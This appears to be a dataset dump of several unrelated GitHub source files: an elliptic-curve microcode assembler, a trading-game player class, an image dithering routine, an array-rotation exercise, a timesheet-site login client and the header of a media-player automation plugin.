+= PATCH_BITS_SIZE\n M = bitstring[pos]\n pos += 1\n opa = bitstring[pos:pos+OPERANDS_BITS_SIZE]\n pos += OPERANDS_BITS_SIZE\n opb = bitstring[pos:pos+OPERANDS_BITS_SIZE]\n pos += OPERANDS_BITS_SIZE\n opc = bitstring[pos:pos+OPERANDS_BITS_SIZE]\n pos += OPERANDS_BITS_SIZE\n # First we get the instruction type\n # Then the instruction\n found_ins = None\n for ins in ipecc_instructions_dict.keys():\n t = ipecc_instructions_dict[ins][1]\n if t == \"PSEUDO\" or t == \"ALIAS\":\n continue\n tt = ipecc_instructions_types_dict[t]\n e = ipecc_instructions_dict[ins][2]\n if (tt == instruction_type) and (e == instruction_opcode):\n found_ins = ins\n break\n if found_ins is None:\n print_error(\"Error line %d: %s: \" % (line_num, l), \"\", \"impossible to disassemble type %s / ins %s (unknown instruction)\" % (instruction_type, instruction_opcode))\n sys.exit(-1)\n # Get our semantics\n sem = ipecc_instructions_dict[found_ins][0]\n # Format our operands\n op_num = 0\n op_string = \"\"\n allops = [opa, opb, opc]\n for op in sem:\n if op 
== ipecc_operand():\n op_string += \"disass_r\"+str(binstring_to_int(allops[op_num]))\n if op == ipecc_const():\n op_string += (\" \"*8)+str(binstring_to_int(allops[op_num]))\n if op == ipecc_flag():\n found_flag = None\n for flag in ipecc_flags_dict.keys():\n if ipecc_flags_dict[flag] == allops[op_num]:\n found_flag = flag\n op_string += flag\n if found_flag is None:\n print_error(\"Error line %d: \" % (line_num), l, \", flag %s is not known\" % (allops[op_num]))\n sys.exit(-1)\n if (op is None) and (t == \"BRANCH\"):\n op_string += \".Label\"+str(binstring_to_int(opa+opb+opc))+\"L\"\n # Save all our branches\n jump_targets.append(binstring_to_int(opa+opb+opc))\n if (op is None) and (t != \"BRANCH\"):\n op_string += \"\\t\"\n op_string += \"\\t\"\n op_num += 1\n # Format the output\n local_disass_output += \"\\t\\t\"+found_ins\n # Handle the X and M bits\n if M == \"1\":\n local_disass_output += \",M\"\n if X == \"1\":\n local_disass_output += \",X\"\n if is_patch == \"1\":\n local_disass_output += \",p\"+str(binstring_to_int(patch))\n local_disass_output += (20-len(local_disass_output))*\" \"\n local_disass_output += \"\\t\"+op_string\n # Formatting\n if t == \"BRANCH\":\n local_disass_output += \"\\t\"*4 \n if t == \"NOP\":\n local_disass_output += \"\\t\"*6\n if barrier == \"1\":\n disass_output.append((None, \"\\t\\tBARRIER\"))\n disass_output.append((instructions_num, local_disass_output))\n if stop == \"1\":\n disass_output.append((None, \"\\t\\tSTOP\"))\n instructions_num += 1\n line_num += 1\n #\n disass_output_str = \"\"\n for (addr, ins) in disass_output:\n # Is our address concerned by a jump?\n if addr in jump_targets:\n # If yes, add a previous label\n disass_output_str += (\".Label%dL:\\n\" % addr)\n disass_output_str += ins\n if addr is not None:\n disass_output_str += \"\\t\"+(\"# %d\" % addr)+\"\\n\"\n else:\n disass_output_str += \"\\n\"\n return disass_output_str\n\ndef disassemble_file(infile):\n instructions_size = (5 + OPCODE_CLASS_BITS_SIZE + OPCODE_BITS_SIZE + PATCH_BITS_SIZE + (3 * OPERANDS_BITS_SIZE))\n with open(infile, \"r\") as f:\n # Parse all the binary strings in that file\n binary = f.read()\n lines = binary.splitlines()\n line_num = 1\n binary = \"\"\n for l in lines:\n check = re.search(r\"\\\"([01]+)\\\"\", l)\n if check is not None:\n bitstring = check.group(1)\n if len(bitstring) != instructions_size:\n print_error(\"Error line %d: \" % line_num, \"\", \"instruction size %d != %d mismatch\" % (len(bitstring), instructions_size))\n sys.exit(-1)\n binary += bitstring+\"\\n\"\n line_num += 1\n # Call the raw disassembler\n disass_output = disassemble(binary)\n outfile = os.path.splitext(infile)[0] + \"_disass.s\"\n with open(outfile, \"w\") as f:\n f.write(\"\\t\\t######################################################################################\\n\")\n f.write(\"\\t\\t# Disassembly automatically generated. For this file to be compiled again, you will #\\n\")\n f.write(\"\\t\\t# have to specify the operands disass_r0, disass_r1, ... in your variables CSV file. #\\n\")\n f.write(\"\\t\\t# These registers are simply the mapped ones at incremental addresses, meaning that #\\n\")\n f.write(\"\\t\\t# you should populate your CSV file with lines like: #\\n\")\n f.write(\"\\t\\t# disass_r0,0 #\\n\")\n f.write(\"\\t\\t# disass_r1,1 #\\n\")\n f.write(\"\\t\\t# ... 
and so on #\\n\")\n f.write(\"\\t\\t# #\\n\")\n f.write(\"\\t\\t# Note that the assembler contains these disassembly registers by default, but if #\\n\")\n f.write(\"\\t\\t# somehow these have changed (e.g. registers size and so on), an update MUST be #\\n\")\n f.write(\"\\t\\t# provided in the variables CSV file for the assembler to properly find them. #\\n\")\n f.write(\"\\t\\t# #\\n\")\n f.write(\"\\t\\t# Also note that instructions with patches could have dummy operands: you will have #\\n\")\n f.write(\"\\t\\t# to know what the exact patch is doing to interpret the disassembly. #\\n\")\n f.write(\"\\t\\t######################################################################################\\n\")\n f.write(disass_output)\n print_progress(\"[+] Disassembly of %s written in %s\" % (infile, outfile))\n return\n\n##########################################################\n\n# Extract from VHDL the information about our constants and instructions\ndef parse_vhdl(vhdl, vhdl_conf):\n global ipecc_instructions_dict\n global ipecc_instructions_types_dict\n global OPERANDS_BITS_SIZE\n global PATCH_BITS_SIZE\n global IMMEDIATE_BITS_SIZE\n global CONSTANTS_BITS_SIZE\n global OPCODE_BITS_SIZE\n global OPCODE_CLASS_BITS_SIZE\n global BIGNUM_BITS_SIZE\n #\n lines = vhdl.splitlines()\n line_num = 1\n for l in lines:\n ## Opcode classes\n check = re.search(r\"constant\\s+OPCODE_([A-Z]+)\\s*:.*:=\\s*\\\"([01]+)\\\"\", l)\n if check is not None:\n # Extract the values\n opcode_type = check.group(1)\n val = check.group(2)\n if OPCODE_CLASS_BITS_SIZE != len(val):\n print_warning(\"Warning: \", \"%s opcode class bit length mismatches (%d != %d), updating\" % (opcode_type, OPCODE_CLASS_BITS_SIZE, len(val)))\n OPCODE_CLASS_BITS_SIZE = len(val)\n ## Opcode values\n check = re.search(r\"constant\\s+OPCODE_([A-Z]+)_([A-Z]+)\\s*:.*\\s*:=\\s*\\\"([01]+)\\\"\", l)\n if check is not None:\n # Extract the values\n opcode_type = check.group(1)\n if opcode_type == \"BRA\":\n opcode_type = \"BRANCH\"\n opcode = check.group(2)\n val = check.group(3)\n # Find it in our dictionary\n for k in ipecc_instructions_dict.keys():\n if ipecc_instructions_dict[k][1] == \"ARITH\" or ipecc_instructions_dict[k][1] == \"BRANCH\":\n if ipecc_instructions_dict[k][3] == opcode:\n if opcode_type != ipecc_instructions_dict[k][1]:\n print_warning(\"Warning: \", \"%s opcode type mismatches (%s != %s), updating\" % (opcode, opcode_type, ipecc_instructions_dict[k][1]))\n ipecc_instructions_dict[k] = (ipecc_instructions_dict[k][0], opcode_type, ipecc_instructions_dict[k][2], ipecc_instructions_dict[k][3], ipecc_instructions_dict[k][4])\n # Check the equality\n if val != ipecc_instructions_dict[k][2]:\n print_warning(\"Warning: \", \"%s opcode value mismatches (%s != %s), updating\" % (opcode, val, ipecc_instructions_dict[k][2]))\n ipecc_instructions_dict[k] = (ipecc_instructions_dict[k][0], ipecc_instructions_dict[k][1], val, ipecc_instructions_dict[k][3], ipecc_instructions_dict[k][4])\n # Sanity check\n if OPCODE_BITS_SIZE != len(val):\n print_warning(\"Warning: \", \"%s opcode bit length mismatches (%d != %d), updating\" % (opcode, OPCODE_BITS_SIZE, len(val)))\n OPCODE_BITS_SIZE = len(val)\n ## Patch size\n check = re.search(r\"OP_PATCH_SZ\\s*:\\s*integer\\s*:=\\s*([0-9]+)\", l)\n if check is not None:\n val = int(check.group(1))\n if PATCH_BITS_SIZE != val:\n print_warning(\"Warning: \", \"PATCH_BITS_SIZE mismatches (%d != %d), updating\" % (PATCH_BITS_SIZE, val))\n PATCH_BITS_SIZE = val\n ## Branch immediate size\n # This must be equal to IRAM_ADDR_SZ\n check = 
re.search(r\"OP_BR_IMM_SZ\\s*:\\s*integer\\s*:=\\s*([A-Z_]+)\", l)\n if check is not None:\n val = check.group(1)\n if val != \"IRAM_ADDR_SZ\":\n print_error(\"Error: \", \"\", \"apparently OP_BR_IMM_SZ = %s, and not IRAM_ADDR_SZ in VHDL file!\" % (val))\n sys.exit(-1)\n check = re.search(r\"IRAM_ADDR_SZ\\s*:\\s*integer\\s*:=\\s*([0-9]+)\", l)\n ## Constants operand size\n check = re.search(r\"OP_SHREG_IMM_SZ\\s*:\\s*positive\\s*:=\\s*([0-9]+)\", l)\n if check is not None:\n val = int(check.group(1))\n if val != CONSTANTS_BITS_SIZE:\n print_warning(\"Warning: \", \"CONSTANTS_BITS_SIZE mismatches (%d != %d), updating\" % (CONSTANTS_BITS_SIZE, val))\n CONSTANTS_BITS_SIZE = val\n line_num += 1\n # Handle the operand and bignum size in the configuration package\n lines = vhdl_conf.splitlines()\n line_num = 1\n nblargenb = nbopcodes = None\n for l in lines:\n ## Operand size\n check = re.search(r\"constant\\s+nblargenb\\s*:\\s*positive\\s*:=\\s*([0-9]+)\", l)\n if check is not None:\n nblargenb = int(check.group(1))\n ## Opcode size\n check = re.search(r\"constant\\s+nbopcodes\\s*:\\s*positive\\s*:=\\s*([0-9]+)\", l)\n if check is not None:\n nbopcodes = int(check.group(1))\n ## Bignum size\n check = re.search(r\"constant\\s+nn\\s*:\\s*positive\\s*:=\\s*([0-9]+)\", l)\n if check is not None:\n nnsize = int(check.group(1))\n if BIGNUM_BITS_SIZE != nnsize:\n print_warning(\"Warning: \", \"BIGNUM_BITS_SIZE mismatches (%d != %d), updating\" % (BIGNUM_BITS_SIZE, nnsize))\n BIGNUM_BITS_SIZE = nnsize\n line_num += 1\n if (nbopcodes is None) or (nblargenb is None):\n print_error(\"Error: \", \"\", \"cannot find nbopcodes or nblargenb in the VHDL conf file\")\n sys.exit(-1)\n # The operand size is log2(nblargenb)\n if 2**int(math.log2(nblargenb)) != nblargenb:\n print_error(\"Error: \", \"\", \"nblargenb = %d is weird ... (not a power of 2)\" % nblargenb)\n sys.exit(-1)\n if 2**OPERANDS_BITS_SIZE != nblargenb:\n opsize = int(math.log2(nblargenb))\n print_warning(\"Warning: \", \"OPERANDS_BITS_SIZE mismatches (%d != %d), updating\" % (OPERANDS_BITS_SIZE, opsize))\n OPERANDS_BITS_SIZE = opsize\n # The immediate branch size should be log2(nbopcodes)\n if 2**int(math.log2(nbopcodes)) != nbopcodes:\n print_error(\"Error: \", \"\", \"nbopcodes = %d is weird ... 
(not a power of 2)\" % nbopcodes)\n sys.exit(-1)\n if 2**IMMEDIATE_BITS_SIZE != nbopcodes:\n immsize = int(math.log2(nbopcodes))\n print_warning(\"Warning: \", \"IMMEDIATE_BITS_SIZE and nbopcodes mismatch (%d != %d), updating\" % (IMMEDIATE_BITS_SIZE, immsize))\n IMMEDIATE_BITS_SIZE = immsize\n print_progress(\"[+] Parsing of VHDL files done, everything OK\")\n\n\n# Extract from CSV the information about our operand variables mapping\ndef parse_csv(csv):\n lines = csv.splitlines()\n line_num = 1\n for l in lines:\n # Skip comments and empty lines\n comment = re.search(r\"^\\s*#\", l)\n empty_line = re.search(r\"^\\s*$\", l)\n if (comment is None) and (empty_line is None):\n check = re.search(r\"([a-zA-Z0-9_]+),([0-9]+)\", l)\n if check is not None:\n op = check.group(1)\n val = int(check.group(2))\n # Check if the operand is in our dictionary and if\n # its address is consistent\n if op in ipecc_operands_dict.keys():\n addr = ipecc_operands_dict[op]\n if int_to_binstring(val, OPERANDS_BITS_SIZE) != addr:\n print_warning(\"Warning: \", \"operand %s from CSV address differs (\\\"%s\\\" (@%d) != \\\"%s\\\" (@%d)), fixing it\" % (op, int_to_binstring(val, OPERANDS_BITS_SIZE), val, addr, binstring_to_int(addr)))\n ipecc_operands_dict[op] = int_to_binstring(val, OPERANDS_BITS_SIZE)\n else:\n print_warning(\"Warning: \", \"operand %s (@%d, \\\"%s\\\") from CSV missing and added\" % (op, val, int_to_binstring(val, OPERANDS_BITS_SIZE)))\n ipecc_operands_dict[op] = int_to_binstring(val, OPERANDS_BITS_SIZE)\n line_num += 1\n # Refresh our instructions dict with new operands regexps\n ipecc_instructions_dict_refresh_operands()\n print_progress(\"[+] Parsing of CSV done, everything OK\")\n\n\n## Sanity check and update our dictionaries if asked\nif len(sys.argv) > 3:\n if len(sys.argv) != 6:\n print_error(\"Error: \", \"\", \"expecting -a, -d, or -e the VHDL file as arg3, the VHDL conf as arg4 and the CSV file as arg5!\")\n sys.exit(-1)\n print(\" -> Parsing %s, %s and %s for checking/updating our constants\" % (sys.argv[3], sys.argv[4], sys.argv[5]))\n with open(sys.argv[3], \"r\") as f1, open(sys.argv[4], \"r\") as f2 :\n vhdl1 = f1.read()\n vhdl2 = f2.read()\n parse_vhdl(vhdl1, vhdl2)\n with open(sys.argv[5], \"r\") as f:\n csv = f.read()\n parse_csv(csv)\n\nif len(sys.argv) < 3:\n print_error(\"Error: \", \"\", \"expecting -a (assemble) or -d (disassemble) or -e (execute) with at least the file\")\n sys.exit(-1)\n\nif sys.argv[1] == \"-a\":\n ## Assembly\n print(\" -> Assembling file %s\" % sys.argv[2])\n assemble_file(sys.argv[2])\nelif sys.argv[1] == \"-d\":\n ## Disassembly\n print(\" -> Disassembling file %s\" % sys.argv[2])\n disassemble_file(sys.argv[2])\nelif sys.argv[1] == \"-e\":\n ## Emulation\n # Read stdin\n print(\" -> Reading initial state from stdin ...\")\n initial_state = sys.stdin.read()\n print(\" -> Emulation of file %s\" % sys.argv[2])\n emulate_file(sys.argv[2], initial_state)\nelse:\n print_error(\"Error: \", \"\", \"unknown option '%s' (-a, -d or -e expected)\" % sys.argv[1])\n sys.exit(-1)\n","repo_name":"ANSSI-FR/IPECC","sub_path":"hdl/common/ecc_curve_iram/ipecc_assembler.py","file_name":"ipecc_assembler.py","file_ext":"py","file_size_in_byte":77648,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"31"} +{"seq_id":"40843233607","text":"import random\nfrom copy import copy\n\nclass Player:\n def __init__(self, player_id):\n self.player_id = player_id\n self.market = {} # {item: price}\n self.inventory = {} # {item: amount}\n 
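# Illustration (example values, not taken from the actual game data):\n # market = {\"wood\": 12} means this player sells wood at 12$ apiece, while\n # inventory = {\"wood\": 3} means three units of wood are currently in stock.\n 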
self.merchant_pos = \"Home\"\n self.money = 50\n self.victory_points = 0\n self.buildings = []\n self.building_card_hand = []\n\n # bookeeping history\n self.player_inventory_history = list()\n self.player_money_history = list()\n \n def log(self, log_string):\n print(\"Player {}: {}\".format(self.player_id, log_string))\n \n def buy(self, item, amount, other_player):\n \n cost = other_player.market[item]*amount\n \n if amount > other_player.inventory[item]:\n raise Exception(\"Tried to buy {} {} items, but only {} available\".format(amount,item,other_player.inventory[item]))\n \n if self.money < cost:\n raise Exception(\"Tried to buy {} {} items. Not enough money: {} < {}\".format(amount, item,self.money,cost))\n \n # make transaction\n self.money -= cost\n other_player.money += cost\n other_player.inventory[item] -= amount\n self.inventory[item] += amount\n self.log(\"Buying: {} {}'s for {} from player {}, {}$ left\".format(amount, item, cost, other_player.player_id, self.money))\n \n \n def set_player_refs(self, other_players_ref, building_deck_ref):\n # get latest info about other player\n self.other_players_ref = other_players_ref\n self.building_deck_ref = building_deck_ref\n\n def init_inventory(self,start_inventory,building_deck):\n # init inventory\n all_resources = building_deck.all_resource_list\n self.inventory = dict()\n for item in all_resources:\n self.inventory[item] = 0\n for key, value in start_inventory.items():\n self.inventory[key] = value\n\n\n def draw_start_cards(self, building_deck):\n for i in range(5):\n card = building_deck.draw_card()\n self.building_card_hand.append(card)\n\n def adjust_market(self):\n self.log(\"ADJUST MARKET\")\n # Player adjusts market price of its inventory items\n self.market = {}\n for item, amount in self.inventory.items():\n if amount > 0:\n price = random.randint(5, 20)\n self.market[item] = price\n self.log({x:\"{} / {}$\".format(self.inventory[x],y) for x,y in self.market.items()})\n\n \n\n\n def trade(self):\n self.log(\"TRADE\")\n # Player select a fellow merchant player to trade with\n fellow_merchant = random.choice(self.other_players_ref)\n self.log(\"Choosing player {} to trade with\".format(fellow_merchant.player_id))\n\n can_afford_items = [x for x,y in fellow_merchant.market.items() if y <= self.money]\n if len(can_afford_items) > 0:\n item = random.choice(can_afford_items)\n price = fellow_merchant.market[item]\n max_amount = self.money // price\n max_amount = min(max_amount,fellow_merchant.inventory[item])\n if max_amount > 1:\n amount = random.randint(1, max_amount)\n self.buy(item, amount, fellow_merchant) \n \n return None\n\n def build(self):\n self.log(\"BUILD\")\n # build building action\n \n can_build_buildings = [(i,x) for i, x in enumerate(self.building_card_hand) if x.can_build(self.inventory)]\n if len(can_build_buildings) > 0:\n to_build_choice = random.choice(can_build_buildings)\n to_build_idx = to_build_choice[0]\n to_build = to_build_choice[1]\n \n # pay building cost\n for item, cost in to_build.cost.items():\n self.inventory[item] -= cost\n self.log(\"building {} at cost {} \".format(to_build.name,to_build.cost))\n # build\n self.buildings.append(to_build)\n self.building_card_hand.pop(to_build_idx)\n else:\n self.log(\"Cant build any of {}\".format([x.name for x in self.building_card_hand]))\n # change building card action\n if len(self.building_card_hand) > 0: \n to_change_idx = random.randint(0,len(self.building_card_hand)-1)\n discard_card = self.building_card_hand[to_change_idx]\n 
self.building_card_hand.pop(to_change_idx)\n self.building_deck_ref.discard_card(discard_card)\n\n # TODO discard pile\n\n # draw cards to fill hand\n while len(self.building_card_hand) < 5:\n card = self.building_deck_ref.draw_card()\n self.building_card_hand.append(card)\n\n return None\n\n def collect(self):\n self.log(\"COLLECT\")\n\n # collect resources\n for building in self.buildings:\n\n # choose among production options\n can_afford_options = []\n for production_option in building.production:\n can_afford = True\n for item_name, item_amount in production_option[\"cost\"].items():\n if self.inventory[item_name] - item_amount < 0: \n can_afford = False\n if can_afford:\n can_afford_options.append(production_option)\n\n if len(can_afford_options) > 0:\n # select what to produce\n production_option = random.choice(can_afford_options)\n\n # pay production cost\n for item_name, item_amount in production_option[\"cost\"].items():\n self.inventory[item_name] -= item_amount\n\n # get produced items\n for item_name, item_amount in production_option[\"result\"].items():\n self.inventory[item_name] += item_amount\n self.log(\"Producing {} {} from {} at cost {}\".format(item_amount,item_name,building.name,production_option[\"cost\"]))\n \n return None\n\n def log_data(self):\n self.player_inventory_history.append(copy(self.inventory))\n self.player_money_history.append(copy(self.money))\n \n\n\n# ==============================\n# Unit tests\n\ndef test_player_buy():\n players = [Player(player_id=x) for x in range(2)]\n building_deck = BuildingDeck()\n \n\n# Bug, inventory goes to negative","repo_name":"maitek/doric_merchants","sub_path":"src/player.py","file_name":"player.py","file_ext":"py","file_size_in_byte":6387,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"14400305043","text":"# -*- encoding: utf-8 -*-\n# Module iadither\n\nfrom numpy import *\n\ndef iadither(f, n):\n import ia636\n\n H,W = f.shape\n D = 1.*array([[0,2],[3,1]])\n d = 1*D\n k = int(log(n/2.)/log(2.))\n for i in range(k):\n u = ones(D.shape)\n d1 = 4*D + d[0,0]*u\n d2 = 4*D + d[0,1]*u\n d3 = 4*D + d[1,0]*u\n d4 = 4*D + d[1,1]*u\n D = concatenate((concatenate((d1,d2),1), concatenate((d3,d4),1)))\n D = (255*abs(D/D.max())).astype('uint8')\n g = tile(D, array(f.shape)//array(D.shape) + array([1,1]))[:H,:W]\n g = ia636.ianormalize(f,[0,255]) >= g\n return g\n\n","repo_name":"MICLab-Unicamp/ia636","sub_path":"ia636/iadither.py","file_name":"iadither.py","file_ext":"py","file_size_in_byte":603,"program_lang":"python","lang":"en","doc_type":"code","stars":14,"dataset":"github-code","pt":"31"} +{"seq_id":"25456261451","text":"''' Python program to perform right rotation in an array by 2 positions '''\n\n# accepting the size of the array from the user\nn = int(input('Array size : '))\n\n# declaring an empty array\na = []\n\n# declaring a variable for the number of rotations to apply\nsr = 2\n\n# loop for inserting the array elements\nfor i in range(0,n):\n \n # inserting the values into the array using the append() function\n a.append(int(input(\"Enter array value : \")))\n\n# displaying the array before right rotation\nprint('Before right rotation : ', a)\n\n# performing the rotation sr times\nfor i in range(0,sr):\n\n # storing the last element in a temporary variable\n temp = a[n-1]\n\n # shifting the remaining elements one position to the right.\n # iterate from the last index (n-1) down to 1, stepping by -1\n for j in range(n-1, 0, -1):\n\n # 
shifting the elements\n a[j] = a[j - 1]\n \n # storing the last element to the first index \n a[0] = temp\n\n# displaying the array after right rotation\nprint('After right rotation : ',a)\n","repo_name":"jerinraju868/Python_Backend_Internship","sub_path":"Jan 5/pg_04.py","file_name":"pg_04.py","file_ext":"py","file_size_in_byte":1058,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"10661094667","text":"import logging\nimport functools\nimport getpass\nimport json\nimport pickle\nimport warnings\nfrom pathlib import Path\nfrom typing import Dict\n\nfrom appdirs import user_data_dir\nfrom requests_html import HTMLSession\n\nlogger = logging.getLogger(__name__)\nsave_dir = Path(user_data_dir(appname=\"x3cli\"))\nsave_dir.mkdir(exist_ok=True)\nCACHE = Path(save_dir) / \"cache.pkl\"\n\nDEFAULT_HEADERS = {\n \"User-Agent\": \"Mozilla/5.0 (Macintosh; Intel Mac OS; rv:94.0) Gecko/20100101 Firefox/94.0\",\n \"Accept\": \"*/*\",\n \"Accept-Language\": \"en-US,en;q=0.5\",\n \"Referer\": \"https://x3.nodum.io/grid\",\n \"DNT\": \"1\",\n \"Connection\": \"keep-alive\",\n}\n\n\ndef login_required(func):\n @functools.wraps(func)\n def wrapper(self, *args, **kwargs):\n if not all([self.employee_id, self.secure, \"NODUMXEBIAURENBOEKEN3\" in self.session.cookies]):\n self.set_from_cache()\n if self.is_authenticated():\n logger.debug(\"You are already logged in\")\n else:\n logger.debug(\"Removing cache\")\n CACHE.unlink(missing_ok=True)\n hint = f\" ({self.username})\" if self.username else \"\"\n username_input = input(f\"Username{hint}: \")\n if username_input:\n self.username = username_input\n password = getpass.getpass()\n logger.debug(f\"Logging you in as {self.username}\")\n self.login(username=self.username, password=password)\n result = func(self, *args, **kwargs)\n return result\n return wrapper\n\n\nclass X3:\n def __init__(self):\n self.session = HTMLSession()\n self.session.headers.update(DEFAULT_HEADERS)\n self.employee_id = None\n self.username = None\n self.name = None\n self.secure = None\n self._is_authenticated = False\n self.set_from_cache()\n\n def is_authenticated(self):\n if not self._is_authenticated:\n url = \"https://37432.afasinsite.nl/x3/timemanagement\"\n response = self.session.get(url)\n if any([\n response.url.startswith(f\"https://{prefix}\")\n for prefix\n in [\"sts.afasonline.com\", \"idp.afasonline.com\"]\n ]): # We are redirected to the login page, so we are logged in\n logger.debug(\"Can't get data, not logged in\")\n self._is_authenticated = False\n else:\n logger.debug(\"You can login!\")\n self._is_authenticated = True\n return self._is_authenticated\n\n def set_from_cache(self):\n if CACHE.exists():\n with open(CACHE, \"rb\") as f:\n cache = pickle.load(f)\n logger.debug(f\"Setting attributes {cache.keys()} from cache\")\n for attr, value in cache.items():\n # if \".\" in attr: # for setting session.cookies\n # attr, subattr = attr.split(\".\")\n # setattr(getattr(self, attr), subattr, value)\n # else:\n setattr(self, attr, value)\n else:\n warnings.warn(\"Cache not found\")\n\n def save_to_cache(self, cache: Dict):\n with open(CACHE, \"wb\") as f:\n pickle.dump(cache, f)\n\n def login(self, username: str, password: str):\n # Insite will redirect us via javascript\n insite_response = self.session.get(\"https://37432.afasinsite.nl/x3/timemanagement\")\n insite_response.raise_for_status()\n\n if not insite_response.url.startswith(\"https://idp.afasonline.com\"):\n raise ValueError(f\"Insite did not 
redirect to idp.afasonline.com. Actual url: {insite_response.url}\")\n\n # Grab csrf_token from javascript\n csrf_token = insite_response.html.find(\"script\")[0].text.split('\"')[1]\n\n data = {\n \"Username\": username,\n \"Token\": \"\",\n \"Captcha\": \"False\",\n \"Password\": password,\n \"ReturnUrl\": \"\",\n \"__RequestVerificationToken\": csrf_token,\n }\n\n # First, login\n login_response = self.session.post(\n 'https://idp.afasonline.com/Account/Password',\n data=data,\n )\n login_response.raise_for_status()\n\n # Errors can occur when password is wrong or you are sending too many 2FA requests\n errors = login_response.html.find(\"div .validation-summary-errors li\")\n if errors:\n raise Exception(\n f\"{len(errors)} error encountered during login: \"\n f\"{','.join([error.text for error in errors])}\"\n )\n\n # Sometimes, you will be asked for your 2FA code\n if login_response.url.startswith(\"https://idp.afasonline.com/TwoFactor/Confirm\"):\n authentication_code = input(\"Input your 2FA code: \")\n\n data = {\n \"Method\": \"GenericTotp\",\n \"TwoFactorKey\": \"\",\n \"Code\": authentication_code,\n \"__RequestVerificationToken\": csrf_token,\n # UI has a checkbox: Trust Device for 7 days.\n \"TrustedDevice\": True,\n }\n two_factor_response = self.session.post(login_response.url, data=data)\n two_factor_response.raise_for_status()\n if not two_factor_response.url.startswith(\"https://x3.nodum.io\"):\n raise ValueError(f\"Did not redirect to x3.nodum.io. Actual url {two_factor_response.url}, did you enter the correct 2FA code?\")\n\n # Our headers need to pass the X3 cookie\n # We get the cookie by doing a requests to X3 first, then updating the header\n # response = self.session.get('https://x3.nodum.io/grid')\n x3_cookie = self.session.cookies[\"NODUMXEBIAURENBOEKEN3\"]\n self.session.headers.update(\n {\"Cookie\": f\"NODUMXEBIAURENBOEKEN3={x3_cookie}\"}\n )\n\n def parse_js_employee_object(text):\n obj_str = text.split(\"{ \")[-1].split(\" }\")[0]\n\n employee_obj = {}\n for line in obj_str.split(\",\"):\n key, value = line.split(\":\")\n key = key.strip()\n value = value.replace(\"'\", \"\").replace('\"', \"\").strip()\n employee_obj[key] = value\n\n return employee_obj\n\n # Some of your data is saved in a javascript object inside the X3 html\n response = self.session.get(\"https://x3.nodum.io/grid\")\n response.raise_for_status()\n script_text = response.html.find(\"script\")[-3].text\n employee = parse_js_employee_object(script_text)\n self.secure = employee['secure']\n self.employee_id = employee['id']\n\n logger.debug(\"You should be logged in!\")\n\n # TODO: Validate this\n cache = {\n \"employee_id\": self.employee_id,\n \"secure\": self.secure,\n \"session\": self.session,\n \"username\": self.username,\n }\n self.save_to_cache(cache)\n\n @login_required\n def geldig(self, year: int, month: int):\n params = {\n \"employee\": self.employee_id,\n \"secure\": self.secure,\n \"y\": year,\n \"m\": month,\n }\n\n response = self.session.post(\"https://x3.nodum.io/json/geldig\", params=params)\n logger.debug(response, response.url)\n response.raise_for_status()\n if response.json() is None:\n raise ValueError(\"json response is None\")\n if response.text == \"\":\n raise ValueError(\"Response is empty\")\n if len(response.json()['projects']) == 1:\n raise ValueError(\"Only one project found, you are not logged in\")\n return response.json()\n\n @login_required\n def illness(self, month: int, year: int):\n params = {\n \"employee\": self.employee_id,\n \"secure\": 
self.secure,\n \"y\": year,\n \"m\": month,\n }\n\n response = self.session.post(\"https://x3.nodum.io/json/illness\", params=params)\n response.raise_for_status()\n if response.json() is None:\n raise ValueError(\"json response is None\")\n if response.text == \"\":\n raise ValueError(\"Response is empty\")\n return response.json()\n\n @login_required\n def lines(self, year: int, month: int):\n data = {\n \"moment\": {\"month\": str(month), \"year\": str(year)},\n \"user\": {\n \"name\": self.name,\n \"id\": str(self.employee_id),\n \"secure\": self.secure,\n \"see\": \"false\",\n },\n }\n response = self.session.post(\n \"https://x3.nodum.io/json/fetchlines\",\n files=dict(json=(None, json.dumps(data))),\n )\n response.raise_for_status()\n\n if response.json() is None:\n raise ValueError(\"json response is None\")\n if response.text == \"\":\n raise ValueError(\"Response is empty\")\n\n return response.json()\n","repo_name":"timotk/x3cli","sub_path":"x3cli/x3.py","file_name":"x3.py","file_ext":"py","file_size_in_byte":9024,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"41101215448","text":"def rev_Arr(a):\n temp=[]\n for i in range((len(a)-1),-1,-1):\n temp.append(a[i]) \n return temp\n \n\nif __name__ == '__main__':\n Arr = list(map(int, input().strip().split(' ')))\n res=rev_Arr(Arr)\n print(res)","repo_name":"subhamrex/Coding_Practice","sub_path":"Python/hackerRank/Array_DS.py","file_name":"Array_DS.py","file_ext":"py","file_size_in_byte":236,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"31"} +{"seq_id":"35116581550","text":"eg.RegisterPlugin(\n name = \"Media Player Classic\",\n author = \"MonsterMagnet\",\n version = \"2.12\",\n kind = \"program\",\n guid = \"{DD75104D-D586-438A-B63D-3AD01A4D4BD3}\",\n createMacrosOnAdd = True,\n description = (\n 'Adds actions to control '\n '
Media Player Classic - Home Cinema.'\n    ),\n    help = \"\"\"\n    For proper functioning, this plugin requires\n    Media Player Classic - Home Cinema (x86/x64)\n    version 1.6.3.5818 or later.\n\n    The option\n    Use the same player for each media file\n    must be selected\n
